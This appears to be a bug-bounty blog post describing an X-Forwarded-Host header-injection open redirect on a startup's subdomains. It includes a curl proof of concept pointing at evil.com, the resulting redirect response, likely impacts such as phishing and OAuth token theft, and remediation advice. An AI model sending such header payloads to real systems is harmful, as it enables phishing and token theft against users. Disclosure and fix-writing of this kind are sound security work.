Back to Articles

☕ How I Redirected the Entire Startup to evil.com — With One Header

AIwolfie 2 min read

🧠 Context

There I was, sipping coffee at 3AM, pretending to be a responsible cybersecurity researcher (but actually waiting for Burp to throw me a bone).

I'm poking around a SaaS app that uses subdomains like customer1.startup.io, client456.startup.io, etc.

Then I notice… hmm… something smells like an open redirect. I sniff harder. ☕🔍

🔍 The Magic Header: X‑Forwarded‑Host

Some genius dev somewhere thought:

"Let's trust whatever hostname the user sends, what could go wrong?"

What could go wrong? EVERYTHING.

🧪 Repro: One Curl to Rule Them All

I shot this simple curl:

curl -v http://client456.startup.io \
  -H "X-Forwarded-Host: evil.com" \
  -H "X-Forwarded-For: evil.com" \
  -H "X-Forwarded-Scheme: http" \
  -H "Host: originaldomain.startup.io"

Boom 💥

HTTP/1.1 303 See Other
Location: http://evil.com/install/update

They literally redirected users to evil.com — with full respect and no questions asked.

Thanks, backend ❤️

👀 The HTML Response? Cherry on Top

<meta http-equiv="refresh" content="0;url='http://evil.com/install/update'" />
<title>Redirecting to http://evil.com/install/update</title>

Bro really served a warm HTML redirect with a side of regret.

🚨 The Impact

So what if it's just a redirect? Here's what can happen:

  • Phishing: Send a legit‑looking reset link → steal passwords
  • OAuth redirect_uri hijack: Ever heard of token theft?
  • Session fixation tricks
  • Trust issues: Literally

All thanks to this lovely blind trust in the X‑Forwarded‑Host.

🧪 But Wait, There's More™️

I tried another subdomain:

http://7821xyz.startup.io

Ran the same payload. Result? Redirected to evil.com again.

This wasn't a one‑off bug. The entire platform was sipping from the same poison teacup. ☕

💡 The Fix (Dear Developers)

  • 🛑 Stop trusting user‑supplied headers unless you own the reverse proxy and you sanitize everything.
  • ✅ Whitelist known domains.
  • ✅ Use relative redirects like /dashboard, not full URLs.
  • ✅ Don't trust X‑Forwarded‑* unless you really, really know what you're doing.

Or just let me keep redirecting your startup to evil.com. 😇

— AIwolfie

Open Redirect Header Injection Bug Bounty Cybersecurity